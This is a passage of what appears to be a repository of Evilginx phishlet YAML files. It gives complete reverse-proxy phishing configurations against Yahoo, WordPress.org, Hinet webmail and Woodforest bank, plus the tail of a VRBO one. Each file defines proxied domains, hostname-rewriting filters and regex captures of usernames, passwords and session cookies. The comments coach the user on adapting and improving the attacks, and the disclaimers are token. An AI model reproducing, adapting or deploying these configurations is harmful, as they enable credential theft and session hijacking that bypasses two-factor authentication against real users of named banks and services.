keys: ['.*,regexp'] 35 | 36 | auth_urls: 37 | - '/*' 38 | - '/' 39 | credentials: 40 | username: 41 | key: '' 42 | search: '"userName":"([^"]*)' 43 | type: 'json' 44 | password: 45 | key: '' 46 | search: '"secret":"([^"]*)' 47 | type: 'json' 48 | 49 | login: 50 | domain: 'www.vrbo.com' 51 | path: '/auth/ui/login?service=https%3A%2F%2Fwww.vrbo.com%2Fp%2Fhome%2Fvalidate-ticket%3Forigin%3D%252Fp%252Fhome%26site%3Dvrbo&screen=login&treatment=2fa' -------------------------------------------------------------------------------- /phishlet_examples/webhinet.yaml: -------------------------------------------------------------------------------- 1 | # LEARN TO USE --debug mode and --developer mode in evilginx. 2 | 3 | name: 'HinetWebmail' 4 | author: '@syriangeneral2' 5 | min_ver: '2.3.0' 6 | proxy_hosts: 7 | - {phish_sub: '', orig_sub: '', domain: 'webmail.hinet.net', session: true, is_landing: true} 8 | 9 | # TRY TO ADD MORE DOMAINS/SUBDOMAINS IF THEY ARE PRESENT DURING SITE LOADING (CHECK NETWORK TAB IN DEVELOPERS TOOLS) 10 | 11 | sub_filters: [] 12 | 13 | # LEARN TO USE SUBFILTERS (DON'T DEPEND ON AUTOFILTER BY EVILGINX) 14 | 15 | # WITHOUT SUB FILTERS SOMETIMES THE USER CAN REDIRECT TO ORIGINAL DOMAINS/SUBDOMAINS , SO USE THE SUBFILTERS CAREFULLY 16 | 17 | #CHECK THESE AIRBNB FILTERS.... 18 | 19 | # - {triggers_on: 'www.airbnb.co.uk', orig_sub: 'www', domain: 'airbnb.co.uk', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 20 | # - {triggers_on: 'www.airbnb.co.uk', orig_sub: 'www', domain: 'airbnb.co.uk', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 21 | # - {triggers_on: 'www.airbnb.co.uk', orig_sub: 'www', domain: 'airbnb.co.uk', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 22 | 23 | 24 | auth_tokens: 25 | - domain: 'webmail.hinet.net' #CHECK ON OFFICIAL WIKI , HOW TO USE AUTH TOKENS TO GRAB ALL NECCESAARY TOKENS. 26 | keys: ['JSESSIONID(.*),regexp'] 27 | 28 | credentials: 29 | username: 30 | key: 'mailid' 31 | search: '(.*)' 32 | type: 'post' 33 | password: 34 | key: 'password' 35 | search: '(.*)' 36 | type: 'post' 37 | # HERE YOU CAN ALSO ADD SOME CUSTOM FIELD TO CAPTURE FROM REQUESTS CHECK WIKI TO SEE HOW TO DO THAT 38 | login: 39 | domain: 'webmail.hinet.net' 40 | path: '/index.html' 41 | 42 | #LEARN TO USE JAVASCRIPT INJECTION AS WELL 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /phishlet_examples/woodforest.yaml: -------------------------------------------------------------------------------- 1 | # THE AUTHOR OF THIS PHISHLET DO NOT SUPPORT ANY ILLEGAL ACTIVITIES... 2 | 3 | author: '@i_am_a_Good_Human' 4 | min_ver: '2.3.0' 5 | proxy_hosts: 6 | - {phish_sub: 'online', orig_sub: 'online', domain: 'woodforest.com', session: true, is_landing: true} 7 | - {phish_sub: 'www', orig_sub: 'www', domain: 'woodforest.com', session: true, is_landing: false} 8 | - {phish_sub: '', orig_sub: '', domain: 'woodforest.com', session: true, is_landing: false} 9 | 10 | sub_filters: 11 | - {triggers_on: 'online.woodforest.com', orig_sub: 'online', domain: 'woodforest.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 12 | - {triggers_on: 'online.woodforest.com', orig_sub: 'online', domain: 'woodforest.com', search: '''{hostname_regexp}'';', replace: '''{hostname_regexp}'';', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 13 | - {triggers_on: 'online.woodforest.com', orig_sub: 'www', domain: 'woodforest.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 14 | - {triggers_on: 'online.woodforest.com', orig_sub: 'www', domain: 'woodforest.com', search: '''{hostname_regexp}'';', replace: '''{hostname_regexp}'';', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 15 | - {triggers_on: 'online.woodforest.com', orig_sub: '', domain: 'woodforest.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 16 | - {triggers_on: 'online.woodforest.com', orig_sub: '', domain: 'woodforest.com', search: '''{hostname_regexp}'';', replace: '''{hostname_regexp}'';', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 17 | 18 | 19 | auth_tokens: 20 | - domain: '.woodforest.com' 21 | keys: ['sessionid','.*,regexp'] 22 | credentials: 23 | username: 24 | key: 'principal' 25 | search: '(.*)' 26 | type: 'post' 27 | password: 28 | key: 'password' 29 | search: '(.*)' 30 | type: 'post' 31 | login: 32 | domain: 'online.woodforest.com' 33 | path: '/login' 34 | 35 | # THE AUTHOR OF THIS PHISHLET DO NOT SUPPORT ANY ILLEGAL ACTIVITIES... 36 | 37 | -------------------------------------------------------------------------------- /phishlet_examples/wordpress.org.yaml: -------------------------------------------------------------------------------- 1 | # Evilginx phishlet configuration file for WordPress.org. 2 | # 3 | # This is a phishing configuration for the main WordPress.org domain, 4 | # it is *not* immediately useful for phishing self-hosted sites that 5 | # run on the WordPress software. 6 | # 7 | # For such self-hosted sites, some modifications are needed. Refer to 8 | # the comments in this file for some guidance on creating a phishlet 9 | # to use against self-hosted WordPress sites. 10 | --- 11 | name: 'WordPress.org' 12 | author: '@meitar' 13 | min_ver: '2.3.0' 14 | 15 | proxy_hosts: 16 | # Proxy the primary domain. 17 | - phish_sub: '' 18 | orig_sub: '' 19 | domain: 'wordpress.org' 20 | session: true 21 | is_landing: true 22 | 23 | # These proxied should be removed when phishing self-hosted sites. 24 | - phish_sub: 'login' 25 | orig_sub: 'login' 26 | domain: 'wordpress.org' 27 | session: true 28 | is_landing: false 29 | - phish_sub: 'make' 30 | orig_sub: 'make' 31 | domain: 'wordpress.org' 32 | session: true 33 | is_landing: false 34 | - phish_sub: 'profiles' 35 | orig_sub: 'profiles' 36 | domain: 'wordpress.org' 37 | session: true 38 | is_landing: false 39 | 40 | sub_filters: [] 41 | 42 | # For self-hosted WordPress sites, you may find it easier to use a 43 | # regular expression to match session cookies, as the cookie names 44 | # are produced unqiely per-site. This can be done as follows: 45 | # 46 | # ```yaml 47 | # - domain: 'self-hosted-domain.com' 48 | # keys: 49 | # - 'wordpress_sec_.*,regexp' 50 | # - 'wordpress_logged_in_.*,regexp' 51 | # ``` 52 | # 53 | # If you do choose to use the regular expression facility, you 54 | # will also then need to use the `auth_urls` dictionary to define 55 | # when Evilginx should actually capture these tokens. Something 56 | # like this should do the trick: 57 | # 58 | # ```yaml 59 | # auth_urls: 60 | # - '.*/wp-admin/.*' 61 | # ``` 62 | # 63 | # The above ensures that the `auth_tokens` are noticed whenever 64 | # the phished user makes requests to URLs containing `wp-admin`. 65 | # 66 | # For the WordPress.org service itself, however, none of the above is 67 | # necessary, and the following simple `auth_tokens` dictionary should 68 | # work just fine. 69 | auth_tokens: 70 | - domain: '.wordpress.org' 71 | keys: ['wporg_logged_in', 'wporg_sec'] 72 | 73 | credentials: 74 | username: 75 | key: 'log' 76 | search: '(.*)' 77 | type: 'post' 78 | password: 79 | key: 'pwd' 80 | search: '(.*)' 81 | type: 'post' 82 | 83 | # For a self-hosted WordPress site, you'll probably want to define the 84 | # `login` dictionary here as follows: 85 | # 86 | # ```yaml 87 | # login: 88 | # domain: 'self-hosted-domain.com' 89 | # path: '/wp-login.php' 90 | # ``` 91 | # 92 | # Some WordPress plugins, such as WooCommerce, change the URL of the 93 | # login page. You'll want to examine the specific site for this. 94 | login: 95 | domain: 'login.wordpress.org' 96 | path: '/' 97 | -------------------------------------------------------------------------------- /phishlet_examples/yahoo(fixed).yaml: -------------------------------------------------------------------------------- 1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES. 2 | # PLEASE DO NOT MISUSE THIS PHISHLET. 3 | 4 | 5 | author: '@an0nud4y' 6 | min_ver: '2.3.0' 7 | proxy_hosts: 8 | - {phish_sub: '', orig_sub: '', domain: 'yahoo.com', session: false, is_landing: false, auto_filter: false} 9 | - {phish_sub: 'www', orig_sub: 'www', domain: 'yahoo.com', session: true, is_landing: false, auto_filter: false} 10 | - {phish_sub: 'mail', orig_sub: 'mail', domain: 'yahoo.com', session: true, is_landing: false, auto_filter: false} 11 | - {phish_sub: 'login', orig_sub: 'login', domain: 'yahoo.com', session: true, is_landing: true, auto_filter: false} 12 | - {phish_sub: 'guce', orig_sub: 'guce', domain: 'yahoo.com', session: true, is_landing: false, auto_filter: false} 13 | - {phish_sub: 'udc', orig_sub: 'udc', domain: 'yahoo.com', session: true, is_landing: false, auto_filter: false} 14 | - {phish_sub: 'fc', orig_sub: 'fc', domain: 'yahoo.com', session: false, is_landing: false, auto_filter: false} 15 | - {phish_sub: 'ads', orig_sub: 'ads', domain: 'yahoo.com', session: false, is_landing: false, auto_filter: false} 16 | - {phish_sub: 'csp', orig_sub: 'csp', domain: 'yahoo.com', session: false, is_landing: false, auto_filter: false} 17 | sub_filters: 18 | - {triggers_on: 'login.yahoo.com', orig_sub: 'login', domain: 'yahoo.com', search: 'login.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 19 | - {triggers_on: 'login.yahoo.com', orig_sub: 'login', domain: 'yahoo.com', search: 'mail.yahoo.com', replace: 'mail.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 20 | - {triggers_on: 'login.yahoo.com', orig_sub: 'login', domain: 'yahoo.com', search: 'guce.yahoo.com', replace: 'guce.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 21 | - {triggers_on: 'login.yahoo.com', orig_sub: 'login', domain: 'yahoo.com', search: 'udc.yahoo.com', replace: 'udc.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 22 | - {triggers_on: 'login.yahoo.com', orig_sub: 'login', domain: 'yahoo.com', search: 'fc.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 23 | - {triggers_on: 'login.yahoo.com', orig_sub: 'login', domain: 'yahoo.com', search: 'ads.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 24 | - {triggers_on: 'mail.yahoo.com', orig_sub: 'mail', domain: 'yahoo.com', search: 'csp.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 25 | - {triggers_on: 'guce.yahoo.com', orig_sub: 'guce', domain: 'yahoo.com', search: 'login.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 26 | - {triggers_on: 'guce.yahoo.com', orig_sub: 'guce', domain: 'yahoo.com', search: 'mail.yahoo.com', replace: 'mail.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 27 | - {triggers_on: 'guce.yahoo.com', orig_sub: 'guce', domain: 'yahoo.com', search: 'guce.yahoo.com', replace: 'guce.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 28 | - {triggers_on: 'guce.yahoo.com', orig_sub: 'guce', domain: 'yahoo.com', search: 'udc.yahoo.com', replace: 'udc.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 29 | - {triggers_on: 'guce.yahoo.com', orig_sub: 'guce', domain: 'yahoo.com', search: 'fc.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 30 | - {triggers_on: 'guce.yahoo.com', orig_sub: 'guce', domain: 'yahoo.com', search: 'ads.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 31 | - {triggers_on: 'fc.yahoo.com', orig_sub: 'fc', domain: 'yahoo.com', search: 'login.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 32 | - {triggers_on: 'fc.yahoo.com', orig_sub: 'fc', domain: 'yahoo.com', search: 'mail.yahoo.com', replace: 'mail.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 33 | - {triggers_on: 'fc.yahoo.com', orig_sub: 'fc', domain: 'yahoo.com', search: 'guce.yahoo.com', replace: 'guce.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 34 | - {triggers_on: 'fc.yahoo.com', orig_sub: 'fc', domain: 'yahoo.com', search: 'udc.yahoo.com', replace: 'udc.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 35 | - {triggers_on: 'fc.yahoo.com', orig_sub: 'fc', domain: 'yahoo.com', search: 'fc.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 36 | - {triggers_on: 'fc.yahoo.com', orig_sub: 'fc', domain: 'yahoo.com', search: 'ads.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 37 | - {triggers_on: 'udc.yahoo.com', orig_sub: 'udc', domain: 'yahoo.com', search: 'login.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 38 | - {triggers_on: 'udc.yahoo.com', orig_sub: 'udc', domain: 'yahoo.com', search: 'mail.yahoo.com', replace: 'mail.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 39 | - {triggers_on: 'udc.yahoo.com', orig_sub: 'udc', domain: 'yahoo.com', search: 'guce.yahoo.com', replace: 'guce.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 40 | - {triggers_on: 'udc.yahoo.com', orig_sub: 'udc', domain: 'yahoo.com', search: 'udc.yahoo.com', replace: 'udc.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 41 | - {triggers_on: 'udc.yahoo.com', orig_sub: 'udc', domain: 'yahoo.com', search: 'fc.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 42 | - {triggers_on: 'udc.yahoo.com', orig_sub: 'udc', domain: 'yahoo.com', search: 'ads.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 43 | auth_tokens: 44 | - domain: '.yahoo.com' 45 | keys: ['.*,regexp'] 46 | - domain: 'mail.yahoo.com' 47 | keys: ['.*,regexp'] 48 | - domain: 'login.yahoo.com' 49 | keys: ['.*,regexp'] 50 | - domain: 'guce.yahoo.com' 51 | keys: ['.*,regexp'] 52 | - domain: 'udc.yahoo.com' 53 | keys: ['.*,regexp'] 54 | credentials: 55 | username: 56 | key: 'username' 57 | search: '(.*)' 58 | type: 'post' 59 | password: 60 | key: '^password$' 61 | search: '(.*)' 62 | type: 'post' 63 | custom: 64 | - key: 'browser-fp-data' 65 | search: '(.*)' 66 | type: 'post' 67 | auth_urls: 68 | - '/consent' 69 | - '/$' 70 | login: 71 | domain: 'login.yahoo.com' 72 | path: '/?.src=ym&.lang=en-US&.intl=us&.done=https%3A%2F%2Fmail.yahoo.com%2Fd' 73 | 74 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES. 75 | # PLEASE DO NOT MISUSE THIS PHISHLET. 76 | 77 | --------------------------------------------------------------------------------